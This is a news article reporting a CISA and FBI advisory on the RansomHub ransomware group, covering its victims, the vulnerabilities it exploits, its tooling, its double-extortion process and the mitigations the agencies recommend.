A new advisory by CISA and the FBI warned of recent attacks by RansomHub and said that the group and its affiliates have successfully hit over 210 victims since its inception in February.
In the advisory, which disseminated several tactics and known Indicators of Compromise (IoCs) linked to the group, the U.S. government said that RansomHub attacks have impacted entities across many different industries, including the healthcare, water and wastewater, IT, government services, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation and communication sectors. These attacks have been observed as recently as this month, said CISA.
“RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV),” according to CISA and the FBI in their Thursday advisory.
RansomHub's affiliate model means that various tactics and techniques are used in different attacks. RansomHub affiliates use several different initial access methods, including phishing and password spraying. They have also exploited known vulnerabilities, including ones in Citrix ADC (CVE-2023-3519), Fortinet FortiOS (CVE-2023-27997), Apache ActiveMQ’s OpenWire protocol (CVE-2023-46604), Atlassian Confluence (CVE-2023-22515), Microsoft Windows (CVE-2017-0144) and more.
The U.S. government observed a variety of other tactics, including the use of Windows Management Instrumentation for disabling antivirus products, and in some cases the use of RansomHub specific tools, like one called EDRKillShifter, for disabling endpoint detection and response tools. Affiliates have also used a number of tools like Mimikatz for gathering credentials, as well as Cobalt Strike, Metasploit and more.
The affiliates use a double-extortion model, first encrypting systems and then exfiltrating the data and leaving a ransom demand for victims. After the encryption occurs, a ransom note drops that does not typically include an initial ransom demand. The victim is provided with a client ID and instructed to contact the group through a unique .onion URL, and then given between three to 90 days to pay a ransom.
“Data exfiltration methods depend heavily on the affiliate conducting the network compromise,” said the advisory. “The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY, Amazon AWS S3 buckets/tools, HTTP POST requests, WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.”
The ransomware group, though only six months old, has already claimed to have targeted several high-profile victims. RansomHub in April claimed to be selling sensitive data stolen from Change Healthcare, after the healthcare giant was hit by the BlackCat ransomware group in February.
CISA and the FBI urged network defenders to take a number of steps to mitigate against RansomHub, such as installing updates as soon as they are released, enabling MFA and training employees to recognize and report phishing attempts.